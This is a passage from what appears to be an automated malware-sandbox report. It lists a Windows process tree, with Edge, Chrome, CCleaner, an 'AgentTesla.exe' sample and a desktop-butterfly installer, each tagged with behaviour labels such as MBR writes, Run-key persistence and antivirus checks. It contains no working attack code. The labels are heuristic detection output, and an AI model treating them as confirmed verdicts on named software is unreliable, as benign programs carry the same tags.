    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1748,4245289001458388030,17169923252779120618,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5600 /prefetch:8
    3⤵
    PID:5312
- - C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1748,4245289001458388030,17169923252779120618,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5824 /prefetch:8
    3⤵
    - Suspicious use of SetWindowsHookEx
    PID:6120
- C:\Program Files\CCleaner\CCleaner64.exe
  "C:\Program Files\CCleaner\CCleaner64.exe"
  2⤵
  - Deletes itself
  - Executes dropped EXE
  - Loads dropped DLL
  - Checks for any installed AV software in registry
  - Writes to the Master Boot Record (MBR)
  - Checks system information in the registry
  - Drops file in System32 directory
  - Drops file in Program Files directory
  - Drops file in Windows directory
  - Checks SCSI registry key(s)
  - Checks processor information in registry
  - Modifies Internet Explorer settings
  - Modifies registry class
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of SetWindowsHookEx
  PID:2120
- - C:\Program Files\CCleaner\CCleaner64.exe
    "C:\Program Files\CCleaner\CCleaner64.exe" /monitor
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Adds Run key to start application
    - Checks for any installed AV software in registry
    - Writes to the Master Boot Record (MBR)
    - Checks system information in the registry
    - Drops file in Program Files directory
    - Drops file in Windows directory
    - Checks processor information in registry
    - Suspicious use of SendNotifyMessage
    - Suspicious use of SetWindowsHookEx
    PID:1644

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1332

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3684

C:\Program Files\CCleaner\CCleanerPerformanceOptimizerService.exe
"C:\Program Files\CCleaner\CCleanerPerformanceOptimizerService.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks for any installed AV software in registry
- Writes to the Master Boot Record (MBR)
- Checks processor information in registry
- Modifies data under HKEY_USERS
PID:4628

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:5160

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of SendNotifyMessage
PID:4924
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffaed18ab58,0x7ffaed18ab68,0x7ffaed18ab78
  2⤵
  PID:1360
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1636 --field-trial-handle=1864,i,2515278036921425157,2548186854009498757,131072 /prefetch:2
  2⤵
  PID:3748
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1864,i,2515278036921425157,2548186854009498757,131072 /prefetch:8
  2⤵
  PID:1484
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2216 --field-trial-handle=1864,i,2515278036921425157,2548186854009498757,131072 /prefetch:8
  2⤵
  PID:4380
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3080 --field-trial-handle=1864,i,2515278036921425157,2548186854009498757,131072 /prefetch:1
  2⤵
  PID:3680
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3096 --field-trial-handle=1864,i,2515278036921425157,2548186854009498757,131072 /prefetch:1
  2⤵
  PID:4520
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4168 --field-trial-handle=1864,i,2515278036921425157,2548186854009498757,131072 /prefetch:8
  2⤵
  PID:4752
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4184 --field-trial-handle=1864,i,2515278036921425157,2548186854009498757,131072 /prefetch:1
  2⤵
  PID:2260
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4396 --field-trial-handle=1864,i,2515278036921425157,2548186854009498757,131072 /prefetch:8
  2⤵
  PID:5824
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4568 --field-trial-handle=1864,i,2515278036921425157,2548186854009498757,131072 /prefetch:8
  2⤵
  PID:3784
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4324 --field-trial-handle=1864,i,2515278036921425157,2548186854009498757,131072 /prefetch:8
  2⤵
  PID:3948
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4316 --field-trial-handle=1864,i,2515278036921425157,2548186854009498757,131072 /prefetch:8
  2⤵
  PID:5468
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4740 --field-trial-handle=1864,i,2515278036921425157,2548186854009498757,131072 /prefetch:8
  2⤵
  PID:4360
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4784 --field-trial-handle=1864,i,2515278036921425157,2548186854009498757,131072 /prefetch:8
  2⤵
  PID:5568

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:3716

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of SendNotifyMessage
PID:5956
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffaed033cb8,0x7ffaed033cc8,0x7ffaed033cd8
  2⤵
  PID:1740
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1952 /prefetch:2
  2⤵
  PID:3672
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2300 /prefetch:3
  2⤵
  PID:1576
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2540 /prefetch:8
  2⤵
  PID:4616
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3180 /prefetch:1
  2⤵
  PID:4036
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3220 /prefetch:1
  2⤵
  PID:4168
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5028 /prefetch:1
  2⤵
  PID:1060
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5056 /prefetch:1
  2⤵
  PID:2788
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3464 /prefetch:8
  2⤵
  PID:1160
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4064 /prefetch:8
  2⤵
  PID:4284
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5248 /prefetch:1
  2⤵
  PID:5728
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3220 /prefetch:1
  2⤵
  PID:5172
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4444 /prefetch:1
  2⤵
  PID:1280
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5380 /prefetch:1
  2⤵
  PID:6112
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5228 /prefetch:8
  2⤵
  PID:1640
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5316 /prefetch:8
  2⤵
  - Modifies registry class
  PID:3700
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5848 /prefetch:1
  2⤵
  PID:3748
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4984 /prefetch:1
  2⤵
  PID:4608
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5480 /prefetch:1
  2⤵
  PID:1392
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6024 /prefetch:1
  2⤵
  PID:4268
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6000 /prefetch:1
  2⤵
  PID:2976
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5244 /prefetch:1
  2⤵
  PID:5716
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5436 /prefetch:1
  2⤵
  PID:4308
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5836 /prefetch:1
  2⤵
  PID:1008
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6372 /prefetch:1
  2⤵
  PID:6000
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5744 /prefetch:8
  2⤵
  - NTFS ADS
  PID:2484
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6596 /prefetch:8
  2⤵
  PID:2184
- C:\Users\Admin\Downloads\AgentTesla.exe
  "C:\Users\Admin\Downloads\AgentTesla.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  - Suspicious use of SetWindowsHookEx
  PID:5792
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7004 /prefetch:1
  2⤵
  PID:5780
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7164 /prefetch:1
  2⤵
  PID:5468
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=216 /prefetch:8
  2⤵
  PID:3380
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6440 /prefetch:8
  2⤵
  - NTFS ADS
  PID:5588
- C:\Users\Admin\Downloads\butterflyondesktop (1).exe
  "C:\Users\Admin\Downloads\butterflyondesktop (1).exe"
  2⤵
  - Executes dropped EXE
  PID:6132
- - C:\Users\Admin\AppData\Local\Temp\is-S0T6E.tmp\butterflyondesktop (1).tmp
    "C:\Users\Admin\AppData\Local\Temp\is-S0T6E.tmp\butterflyondesktop (1).tmp" /SL5="$100060,2719719,54272,C:\Users\Admin\Downloads\butterflyondesktop (1).exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops file in Program Files directory
    PID:3676
  - - C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe
      "C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Suspicious use of SendNotifyMessage
      PID:884
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://freedesktopsoft.com/butterflyondesktoplike.html
      4⤵
      PID:1656
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffaed033cb8,0x7ffaed033cc8,0x7ffaed033cd8
        5⤵
        
        PID:5168
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7000 /prefetch:1
  2⤵
  PID:5052
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7068 /prefetch:1
  2⤵
  PID:6000
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6480 /prefetch:1
  2⤵
  PID:3188
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7232 /prefetch:1
  2⤵
  PID:4064
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6440 /prefetch:1
  2⤵
  PID:2156
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7284 /prefetch:1
  2⤵
  PID:3044
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=7700 /prefetch:2
  2⤵
  PID:4916
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7040 /prefetch:1
  2⤵
  PID:1020
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7396 /prefetch:8
  2⤵
  PID:5200
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
